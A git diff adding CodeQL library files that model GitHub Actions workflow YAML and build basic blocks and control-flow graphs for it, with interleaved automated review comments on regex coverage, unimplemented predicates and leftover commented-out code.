@@ -0,0 +1,400 @@ +/** + * Libraries for modeling GitHub Actions workflow files written in YAML. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ + +import codeql.actions.ast.internal.Yaml +import codeql.files.FileSystem + +// ALVARO: Make it private +/** + * Libraries for modeling GitHub Actions workflow files written in YAML. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ +module Actions { + /** A YAML node in a GitHub Actions workflow or a custom composite action file. */ + private class Node extends YamlNode { + Node() { + exists(File f | + f = this.getLocation().getFile() and + ( + f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or + f.getBaseName() = ["action.yml", "action.yaml"] or + // ALVARO: Add any yaml files temporary for development + f.getExtension() = ["yml", "yaml"] + ) + ) + } + } + + /** + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. + */ + class CompositeAction extends Node, YamlDocument, YamlMapping { + CompositeAction() { + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } + + /** Gets the `runs` mapping. */ + Runs getRuns() { result = this.lookup("runs") } + } + + /** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ + class Runs extends StepsContainer { + CompositeAction action; + + Runs() { action.lookup("runs") = this } + + /** Gets the action that this `runs` mapping is in. */ + CompositeAction getAction() { result = action } + + /** Gets the `using` mapping. 
*/ + Using getUsing() { result = this.lookup("using") } + } + + /** + * The parent class of the class that can contain `steps` mappings. (`Job` or `Runs` currently.) + */ + abstract class StepsContainer extends YamlNode, YamlMapping { + /** Gets the sequence of `steps` within this YAML node. */ + YamlSequence getSteps() { result = this.lookup("steps") } + } + + /** + * A `using` mapping in a custom composite action YAML. + */ + class Using extends YamlNode, YamlScalar { + Runs runs; + + Using() { runs.lookup("using") = this } + + /** Gets the `runs` mapping that this `using` mapping is in. */ + Runs getRuns() { result = runs } + } + + /** + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ + class Workflow extends Node, YamlDocument, YamlMapping { + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + YamlMapping getJobs() { result = this.lookup("jobs") } + + /** Gets the 'global' `env` mapping in this workflow. */ + WorkflowEnv getEnv() { result = this.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = this.lookup("name").(YamlString).getValue() } + + /** Gets the name of the workflow file. */ + string getFileName() { result = this.getFile().getBaseName() } + + /** Gets the `on:` in this workflow. */ + On getOn() { result = this.lookup("on") } + + /** Gets the job within this workflow with the given job ID. */ + Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + } + + /** + * An Actions On trigger within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#on. + */ + class On extends YamlNode, YamlMappingLikeNode { + Workflow workflow; + + On() { workflow.lookup("on") = this } + + /** Gets the workflow that this trigger is in. 
*/ + Workflow getWorkflow() { result = workflow } + } + + /** A common class for `env` in workflow, job or step. */ + abstract class Env extends YamlNode, YamlMapping { } + + /** A workflow level `env` mapping. */ + class WorkflowEnv extends Env { + Workflow workflow; + + WorkflowEnv() { workflow.lookup("env") = this } + + /** Gets the workflow this field belongs to. */ + Workflow getWorkflow() { result = workflow } + } + + /** A job level `env` mapping. */ + class JobEnv extends Env { + Job job; + + JobEnv() { job.lookup("env") = this } + + /** Gets the job this field belongs to. */ + Job getJob() { result = job } + } + + /** A step level `env` mapping. */ + class StepEnv extends Env { + Step step; + + StepEnv() { step.lookup("env") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ + class Job extends StepsContainer { + string jobId; + Workflow workflow; + + Job() { this = workflow.getJobs().lookup(jobId) } + + /** + * Gets the ID of this job, as a string. + * This is the job's key within the `jobs` mapping. + */ + string getId() { result = jobId } + + /** + * Gets the ID of this job, as a YAML scalar node. + * This is the job's key within the `jobs` mapping. + */ + YamlString getIdNode() { workflow.getJobs().maps(result, this) } + + /** Gets the human-readable name of this job, if any, as a string. */ + string getName() { result = this.getNameNode().getValue() } + + /** Gets the human-readable name of this job, if any, as a YAML scalar node. */ + YamlString getNameNode() { result = this.lookup("name") } + + /** Gets the step at the given index within this job. */ + Step getStep(int index) { result.getJob() = this and result.getIndex() = index } + + /** Gets the `env` mapping in this job. 
*/ + JobEnv getEnv() { result = this.lookup("env") } + + /** Gets the workflow this job belongs to. */ + Workflow getWorkflow() { result = workflow } + + /** Gets the value of the `if` field in this job, if any. */ + JobIf getIf() { result.getJob() = this } + + /** Gets the value of the `runs-on` field in this job. */ + JobRunson getRunsOn() { result.getJob() = this } + } + + /** + * An `if` within a job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idif. + */ + class JobIf extends YamlNode, YamlScalar { + Job job; + + JobIf() { job.lookup("if") = this } + + /** Gets the step this field belongs to. */ + Job getJob() { result = job } + } + + /** + * A `runs-on` within a job. + * See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idruns-on. + */ + class JobRunson extends YamlNode, YamlScalar { + Job job; + + JobRunson() { job.lookup("runs-on") = this } + + /** Gets the step this field belongs to. */ + Job getJob() { result = job } + } + + /** + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. + */ + class Step extends YamlNode, YamlMapping { + int index; + StepsContainer parent; + + Step() { this = parent.getSteps().getElement(index) } + + /** Gets the 0-based position of this step within the sequence of `steps`. */ + int getIndex() { result = index } + + /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ + Job getJob() { result = parent } + + /** Gets the `runs` this step belongs to, if the step belongs to a `runs` in a custom composite action. Has no result if the step belongs to a `job` in a workflow. */ + Runs getRuns() { result = parent } + + /** Gets the value of the `uses` field in this step, if any. 
*/ + Uses getUses() { result.getStep() = this } + + /** Gets the value of the `run` field in this step, if any. */ + Run getRun() { result.getStep() = this } + + /** Gets the value of the `if` field in this step, if any. */ + StepIf getIf() { result.getStep() = this } + + /** Gets the value of the `env` field in this step, if any. */ + StepEnv getEnv() { result = this.lookup("env") } + + /** Gets the ID of this step, if any. */ + string getId() { result = this.lookup("id").(YamlString).getValue() } + } + + /** + * An `if` within a step. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsif. + */ + class StepIf extends YamlNode, YamlScalar { + Step step; + + StepIf() { step.lookup("if") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ + private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + + /** + * A `uses` field within an Actions job step, which references an action as a reusable unit of code. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsuses. + * + * For example: + * ``` + * uses: actions/checkout@v2 + * ``` + * + * Does not handle local repository references, e.g. `.github/actions/action-name`. + */ + class Uses extends YamlNode, YamlScalar { + Step step; + + Uses() { step.lookup("uses") = this } + + /** Gets the step this field belongs to. 
*/ + Step getStep() { result = step } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + string getGitHubRepository() { + result = + this.getValue().regexpCapture(usesParser(), 1) + "/" + + this.getValue().regexpCapture(usesParser(), 2) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + string getVersion() { result = this.getValue().regexpCapture(usesParser(), 3) } + } + + /** + * A `with` field within an Actions job step, which references an action as a reusable unit of code. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepswith. + * + * For example: + * ``` + * with: + * arg1: 1 + * arg2: abc + * ``` + */ + class With extends YamlNode, YamlMapping { + Step step; + + With() { step.lookup("with") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * A `ref:` field within an Actions `with:` specific to `actions/checkout` action. + * + * For example: + * ``` + * uses: actions/checkout@v2 + * with: + * ref: ${{ github.event.pull_request.head.sha }} + * ``` + */ + class Ref extends YamlNode, YamlString { + With with; + + Ref() { with.lookup("ref") = this } + + /** Gets the `with` field this field belongs to. */ + With getWith() { result = with } + } + + /** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. 
+ * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ + string getASimpleReferenceExpression(YamlString node) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + node.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) + .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + /** Extracts the 'name' part from env.name */ + bindingset[name] + string getEnvName(string name) { result = name.regexpCapture("env\\.([A-Za-z0-9_]+)", 1) } + + /** + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. + */ + class Run extends YamlNode, YamlString { + Step step; + + Run() { step.lookup("run") = this } + + /** Gets the step that executes this `run` command. */ + Step getStep() { result = step } + } + + /** + * ALVARO + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds + */ + class Needs extends YamlNode { + Job job; + + Needs() { job.lookup("needs") = this } + + Job getJob() { result = job } + + Job getANeededJob() { + if this instanceof YamlString + then result.getId() = this.(YamlString).getValue() and result.getFile() = job.getFile() + else + if this instanceof YamlSequence + then + result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + result.getFile() = job.getFile() + else none() + } + } +} diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/ql/lib/codeql/actions/ast/internal/Yaml.qll new file mode 100644 index 00000000000..402ceae44ce --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Yaml.qll 
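Review bot: `usesParser()` is `([^/]+)/([^/@]+)@(.+)`, and `regexpCapture` has to match the whole string, so a `uses:` value with a path inside the repository (`owner/repo/path@ref`) or a `docker://` image gets no result from `Uses.getGitHubRepository()` or `Uses.getVersion()`. The doc comment on `Uses` only excludes local references, so a query that checks how third-party actions are pinned would silently skip those steps. Allowing an optional sub-path between the repository and `@`, e.g. `([^/]+)/([^/@]+)(?:/[^@]+)?@(.+)`, keeps the three capture groups as they are. The `Node` characteristic predicate in this hunk also accepts every `.yml`/`.yaml` file (its comment marks this as temporary), which will put non-workflow YAML into results until it is removed.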
@@ -0,0 +1,50 @@ +/** + * Provides classes for working with YAML data. + * + * YAML documents are represented as abstract syntax trees whose nodes + * are either YAML values or alias nodes referring to another YAML value. + */ + +private import codeql.yaml.Yaml as LibYaml + +private module YamlSig implements LibYaml::InputSig { + import codeql.Locations + + class LocatableBase extends @yaml_locatable { + Location getLocation() { yaml_locations(this, result) } + + string toString() { none() } + } + + class NodeBase extends LocatableBase, @yaml_node { + NodeBase getChildNode(int i) { yaml(result, _, this, i, _, _) } + + string getTag() { yaml(this, _, _, _, result, _) } + + string getAnchor() { yaml_anchors(this, result) } + + override string toString() { yaml(this, _, _, _, _, result) } + } + + class ScalarNodeBase extends NodeBase, @yaml_scalar_node { + int getStyle() { yaml_scalars(this, result, _) } + + string getValue() { yaml_scalars(this, _, result) } + } + + class CollectionNodeBase extends NodeBase, @yaml_collection_node { } + + class MappingNodeBase extends CollectionNodeBase, @yaml_mapping_node { } + + class SequenceNodeBase extends CollectionNodeBase, @yaml_sequence_node { } + + class AliasNodeBase extends NodeBase, @yaml_alias_node { + string getTarget() { yaml_aliases(this, result) } + } + + class ParseErrorBase extends LocatableBase, @yaml_error { + string getMessage() { yaml_errors(this, result) } + } +} + +import LibYaml::Make diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll new file mode 100644 index 00000000000..cdc7b0cf24f --- /dev/null +++ b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll 
@@ -0,0 +1,445 @@ +/** Provides classes representing basic blocks. */ + +private import codeql.actions.Cfg +private import codeql.actions.Ast +private import codeql.Locations + +/** + * A basic block, that is, a maximal straight-line sequence of control flow nodes + * without branches or joins. + */ +class BasicBlock extends TBasicBlockStart { + /** Gets the scope of this basic block. */ + final CfgScope getScope() { result = this.getFirstNode().getScope() } + + /** Gets an immediate successor of this basic block, if any. */ + BasicBlock getASuccessor() { result = this.getASuccessor(_) } + + /** Gets an immediate successor of this basic block of a given type, if any. */ + BasicBlock getASuccessor(SuccessorType t) { + result.getFirstNode() = this.getLastNode().getASuccessor(t) + } + + /** Gets an immediate predecessor of this basic block, if any. */ + BasicBlock getAPredecessor() { result.getASuccessor() = this } + + /** Gets an immediate predecessor of this basic block of a given type, if any. */ + BasicBlock getAPredecessor(SuccessorType t) { result.getASuccessor(t) = this } + + /** Gets the control flow node at a specific (zero-indexed) position in this basic block. */ + Node getNode(int pos) { bbIndex(this.getFirstNode(), result, pos) } + + /** Gets a control flow node in this basic block. */ + Node getANode() { result = this.getNode(_) } + + /** Gets the first control flow node in this basic block. */ + Node getFirstNode() { this = TBasicBlockStart(result) } + + /** Gets the last control flow node in this basic block. */ + Node getLastNode() { result = this.getNode(this.length() - 1) } + + /** Gets the length of this basic block. */ + int length() { result = strictcount(this.getANode()) } + + /** + * Holds if this basic block immediately dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which is an immediate + * predecessor of `bb`). 
+ * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 immediately dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate immediatelyDominates(BasicBlock bb) { bbIDominates(this, bb) } + + /** + * Holds if this basic block strictly dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 strictly dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate strictlyDominates(BasicBlock bb) { bbIDominates+(this, bb) } + + /** + * Holds if this basic block dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 dominates the basic + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate dominates(BasicBlock bb) { + bb = this or + this.strictlyDominates(bb) + } + + /** + * Holds if `df` is in the dominance frontier of this basic block. + * That is, this basic block dominates a predecessor of `df`, but + * does not dominate `df` itself. 
+ * + * Example: + * + * ```rb + * def m x + * if x < 0 + * x = -x + * if x > 10 + * x = x - 1 + * end + * end + * puts x + * end + * ``` + * + * The basic block on line 8 is in the dominance frontier + * of the basic block starting on line 3 because that block + * dominates the basic block on line 4, which is a predecessor of + * `puts x`. Also, the basic block starting on line 3 does not + * dominate the basic block on line 8. + */ + predicate inDominanceFrontier(BasicBlock df) { + this.dominatesPredecessor(df) and + not this.strictlyDominates(df) + } + + /** + * Holds if this basic block dominates a predecessor of `df`. + */ + private predicate dominatesPredecessor(BasicBlock df) { this.dominates(df.getAPredecessor()) } + + /** + * Gets the basic block that immediately dominates this basic block, if any. + * + * That is, all paths reaching this basic block from some entry point + * basic block must go through the result, which is an immediate basic block + * predecessor of this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 is an immediate dominator of + * the basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block, and the `if` block + * is an immediate predecessor of `return 1`). + */ + BasicBlock getImmediateDominator() { bbIDominates(result, this) } + + /** + * Holds if this basic block strictly post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 strictly post-dominates the basic block on + * line 3 (all paths to the exit point of `m` from `puts "b"` must go + * through `puts "m"`). 
+ */ + predicate strictlyPostDominates(BasicBlock bb) { bbIPostDominates+(this, bb) } + + /** + * Holds if this basic block post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 post-dominates the basic block on line 3 + * (all paths to the exit point of `m` from `puts "b"` must go through + * `puts "m"`). + */ + predicate postDominates(BasicBlock bb) { + this.strictlyPostDominates(bb) or + this = bb + } + + /** Holds if this basic block is in a loop in the control flow graph. */ + predicate inLoop() { this.getASuccessor+() = this } + + /** Gets a textual representation of this basic block. */ + string toString() { result = this.getFirstNode().toString() } + + /** Gets the location of this basic block. */ + Location getLocation() { result = this.getFirstNode().getLocation() } +} + +cached +private module Cached { + /** Internal representation of basic blocks. */ + cached + newtype TBasicBlock = TBasicBlockStart(Node cfn) { startsBB(cfn) } + + /** Holds if `cfn` starts a new basic block. */ + private predicate startsBB(Node cfn) { + not exists(cfn.getAPredecessor()) and exists(cfn.getASuccessor()) + or + cfn.isJoin() + or + cfn.getAPredecessor().isBranch() + or + /* + * In cases such as + * + * ```rb + * if x or y + * foo + * else + * bar + * ``` + * + * we have a CFG that looks like + * + * x --false--> [false] x or y --false--> bar + * \ | + * --true--> y --false-- + * \ + * --true--> [true] x or y --true--> foo + * + * and we want to ensure that both `foo` and `bar` start a new basic block, + * in order to get a `ConditionalBlock` out of the disjunction. + */ + + exists(cfn.getAPredecessor(any(BooleanSuccessor s))) + } + + /** + * Holds if `succ` is a control flow successor of `pred` within + * the same basic block. 
+ */ + private predicate intraBBSucc(Node pred, Node succ) { + succ = pred.getASuccessor() and + not startsBB(succ) + } + + /** + * Holds if `cfn` is the `i`th node in basic block `bb`. + * + * In other words, `i` is the shortest distance from a node `bb` + * that starts a basic block to `cfn` along the `intraBBSucc` relation. + */ + cached + predicate bbIndex(Node bbStart, Node cfn, int i) = + shortestDistances(startsBB/1, intraBBSucc/2)(bbStart, cfn, i) + + /** + * Holds if the first node of basic block `succ` is a control flow + * successor of the last node of basic block `pred`. + */ + private predicate succBB(BasicBlock pred, BasicBlock succ) { succ = pred.getASuccessor() } + + /** Holds if `dom` is an immediate dominator of `bb`. */ + cached + predicate bbIDominates(BasicBlock dom, BasicBlock bb) = + idominance(entryBB/1, succBB/2)(_, dom, bb) + + /** Holds if `pred` is a basic block predecessor of `succ`. */ + private predicate predBB(BasicBlock succ, BasicBlock pred) { succBB(pred, succ) } + + /** Holds if `bb` is an exit basic block that represents normal exit. */ + private predicate normalExitBB(BasicBlock bb) { bb.getANode().(AnnotatedExitNode).isNormal() } + + /** Holds if `dom` is an immediate post-dominator of `bb`. */ + cached + predicate bbIPostDominates(BasicBlock dom, BasicBlock bb) = + idominance(normalExitBB/1, predBB/2)(_, dom, bb) + + /** + * Gets the `i`th predecessor of join block `jb`, with respect to some + * arbitrary order. 
+ */ + cached + JoinBlockPredecessor getJoinBlockPredecessor(JoinBlock jb, int i) { + none() + /* + * result = + * rank[i + 1](JoinBlockPredecessor jbp | + * jbp = jb.getAPredecessor() + * | + * jbp order by JoinBlockPredecessors::getId(jbp), JoinBlockPredecessors::getSplitString(jbp) + * ) + */ + + } + + cached + predicate immediatelyControls(ConditionBlock cb, BasicBlock succ, BooleanSuccessor s) { + succ = cb.getASuccessor(s) and + forall(BasicBlock pred | pred = succ.getAPredecessor() and pred != cb | succ.dominates(pred)) + } + + cached + predicate controls(ConditionBlock cb, BasicBlock controlled, BooleanSuccessor s) { + exists(BasicBlock succ | cb.immediatelyControls(succ, s) | succ.dominates(controlled)) + } +} + +private import Cached + +/** Holds if `bb` is an entry basic block. */ +private predicate entryBB(BasicBlock bb) { bb.getFirstNode() instanceof EntryNode } + +/** + * An entry basic block, that is, a basic block whose first node is + * an entry node. + */ +class EntryBasicBlock extends BasicBlock { + EntryBasicBlock() { entryBB(this) } +} + +/** + * An annotated exit basic block, that is, a basic block whose last node is + * an annotated exit node. + */ +class AnnotatedExitBasicBlock extends BasicBlock { + private boolean normal; + + AnnotatedExitBasicBlock() { + exists(AnnotatedExitNode n | + n = this.getANode() and + if n.isNormal() then normal = true else normal = false + ) + } + + /** Holds if this block represent a normal exit. */ + final predicate isNormal() { normal = true } +} + +/** + * An exit basic block, that is, a basic block whose last node is + * an exit node. 
+ */ +class ExitBasicBlock extends BasicBlock { + ExitBasicBlock() { this.getLastNode() instanceof ExitNode } +} + +/* + * private module JoinBlockPredecessors { + * private predicate id(AstNode x, AstNode y) { x = y } + * + * private predicate idOf(AstNode x, int y) = equivalenceRelation(id/2)(x, y) + * + * int getId(JoinBlockPredecessor jbp) { + * idOf(Ast::toTreeSitter(jbp.getFirstNode().(AstCfgNode).getAstNode()), result) + * or + * idOf(Ast::toTreeSitter(jbp.(EntryBasicBlock).getScope()), result) + * } + * + * string getSplitString(JoinBlockPredecessor jbp) { + * result = jbp.getFirstNode().(AstCfgNode).getSplitsString() + * or + * not exists(jbp.getFirstNode().(AstCfgNode).getSplitsString()) and + * result = "" + * } + * } + */ + +/** A basic block with more than one predecessor. */ +class JoinBlock extends BasicBlock { + JoinBlock() { this.getFirstNode().isJoin() } + + /** + * Gets the `i`th predecessor of this join block, with respect to some + * arbitrary order. + */ + JoinBlockPredecessor getJoinBlockPredecessor(int i) { result = getJoinBlockPredecessor(this, i) } +} + +/** A basic block that is an immediate predecessor of a join block. */ +class JoinBlockPredecessor extends BasicBlock { + JoinBlockPredecessor() { this.getASuccessor() instanceof JoinBlock } +} + +/** A basic block that terminates in a condition, splitting the subsequent control flow. */ +class ConditionBlock extends BasicBlock { + ConditionBlock() { this.getLastNode().isCondition() } + + /** + * Holds if basic block `succ` is immediately controlled by this basic + * block with conditional value `s`. That is, `succ` is an immediate + * successor of this block, and `succ` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. 
+ */ + predicate immediatelyControls(BasicBlock succ, BooleanSuccessor s) { + immediatelyControls(this, succ, s) + } + + /** + * Holds if basic block `controlled` is controlled by this basic block with + * conditional value `s`. That is, `controlled` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } +} + diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll new file mode 100644 index 00000000000..8b6696fe777 --- /dev/null +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
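Review bot: `getJoinBlockPredecessor` in the `Cached` module is `none()` with its ranking logic left in a comment, so `JoinBlock.getJoinBlockPredecessor(i)` never has a result although its QLDoc promises the `i`th predecessor. Either restore an ordering that works for Actions nodes or state the gap in the QLDoc, for example `/** Not implemented yet: has no result until join-block predecessors can be ordered. */`. The commented-out `JoinBlockPredecessors` module and the `rb` examples in the dominance QLDoc look carried over from another language's library; they would read better removed or rewritten around a workflow job.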
@@ -0,0 +1,169 @@ +private import codeql.actions.Ast +private import codeql.controlflow.Cfg as CfgShared +private import codeql.Locations + +module Completion { + private newtype TCompletion = + TSimpleCompletion() or + TBooleanCompletion(boolean b) { b in [false, true] } or + TReturnCompletion() + + abstract class Completion extends TCompletion { + abstract string toString(); + + predicate isValidForSpecific(AstNode e) { none() } + + predicate isValidFor(AstNode e) { this.isValidForSpecific(e) } + + abstract SuccessorType getAMatchingSuccessorType(); + } + + abstract class NormalCompletion extends Completion { } + + class SimpleCompletion extends NormalCompletion, TSimpleCompletion { + override string toString() { result = "SimpleCompletion" } + + override predicate isValidFor(AstNode e) { not any(Completion c).isValidForSpecific(e) } + + override NormalSuccessor getAMatchingSuccessorType() { any() } + } + + class BooleanCompletion extends NormalCompletion, TBooleanCompletion { + boolean value; + + BooleanCompletion() { this = TBooleanCompletion(value) } + + override string toString() { result = "BooleanCompletion(" + value + ")" } + + override predicate isValidForSpecific(AstNode e) { + none() + // TODO: add support for conditional expressions? 
+ //e = any(ConditionalExpression c).getCondition() + } + + override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } + + final boolean getValue() { result = value } + } + + class ReturnCompletion extends Completion, TReturnCompletion { + override string toString() { result = "ReturnCompletion" } + + override predicate isValidForSpecific(AstNode e) { none() } + + override ReturnSuccessor getAMatchingSuccessorType() { any() } + } + + cached + private newtype TSuccessorType = + TNormalSuccessor() or + TBooleanSuccessor(boolean b) { b in [false, true] } or + TReturnSuccessor() + + class SuccessorType extends TSuccessorType { + string toString() { none() } + } + + class NormalSuccessor extends SuccessorType, TNormalSuccessor { + override string toString() { result = "successor" } + } + + class BooleanSuccessor extends SuccessorType, TBooleanSuccessor { + boolean value; + + BooleanSuccessor() { this = TBooleanSuccessor(value) } + + override string toString() { result = value.toString() } + + boolean getValue() { result = value } + } + + class ReturnSuccessor extends SuccessorType, TReturnSuccessor { + override string toString() { result = "return" } + } + // Why is there no conditional successor type? +} + +module CfgScope { + abstract class CfgScope extends AstNode { } + + private class JobScope extends CfgScope instanceof JobStmt { } +} + +private module Implementation implements CfgShared::InputSig { + import codeql.actions.Ast + import Completion + import CfgScope + + predicate completionIsNormal(Completion c) { not c instanceof ReturnCompletion } + + // Not using CFG splitting, so the following are just dummy types. 
+ private newtype TUnit = Unit() + + class SplitKindBase = TUnit; + + class Split extends TUnit { + abstract string toString(); + } + + predicate completionIsSimple(Completion c) { c instanceof SimpleCompletion } + + predicate completionIsValidFor(Completion c, AstNode e) { c.isValidFor(e) } + + CfgScope getCfgScope(AstNode e) { + exists(AstNode p | p = e.getParentNode() | + result = p + or + not p instanceof CfgScope and result = getCfgScope(p) + ) + } + + int maxSplits() { result = 0 } + + predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(JobStmt), e) } + + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(JobStmt), e, c) } + + predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } + + predicate successorTypeIsCondition(SuccessorType t) { t instanceof BooleanSuccessor } + + SuccessorType getAMatchingSuccessorType(Completion c) { result = c.getAMatchingSuccessorType() } + + predicate isAbnormalExitType(SuccessorType t) { none() } +} + +module CfgImpl = CfgShared::Make; + +private import CfgImpl +private import Completion +private import CfgScope + +// Trees are what end up creating Cfg::Node objects and therefore DataFlow::Node objects. +// Its also required that there is parent/child relationships between nodes so orphans nodes will not appear as either Cfg::Node or DataFlow::Node. +// For example +// - ArgumentExpr should be children of UsesExpr, and UsesExpr should be children of StepStmt. 
+// TODO: We need to make VarAccess expressions part ot the tree as they are currently orphans +private class CfgNodeTree extends StandardPreOrderTree instanceof AstNode { + override AstNode getChildNode(int i) { result = super.getChildNodeByOrder(i) } +} +// private class JobStmtTree extends StandardPreOrderTree instanceof JobStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// private class StepStmtTree extends StandardPreOrderTree instanceof StepStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// // TODO: Do we need this or we can just care about the ExprAccessExpr +// private class ArgumentTree extends LeafTree instanceof ArgumentExpr { } +// +// private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } +// +// private class StepOutputAccessTree extends LeafTree instanceof StepOutputAccessExpr { } +// +// private class JobOutputAccessTree extends LeafTree instanceof JobOutputAccessExpr { } \ No newline at end of file diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll new file mode 100644 index 00000000000..5ce82a134ce --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
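Review bot: Every `isValidForSpecific` override in the `Completion` module is `none()`, so `SimpleCompletion` is the only completion valid for any node and no `BooleanSuccessor` or `ReturnSuccessor` edge is produced. That leaves `ConditionBlock` and the `controls` predicates in BasicBlocks.qll with nothing to hold on, which is worth stating where the open question `// Why is there no conditional successor type?` now sits, e.g. `// No AST node yields a Boolean or Return completion yet, so all CFG edges are NormalSuccessor.`. The block of commented-out `*Tree` classes at the end of the file should be deleted rather than committed, and the file lacks a trailing newline.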
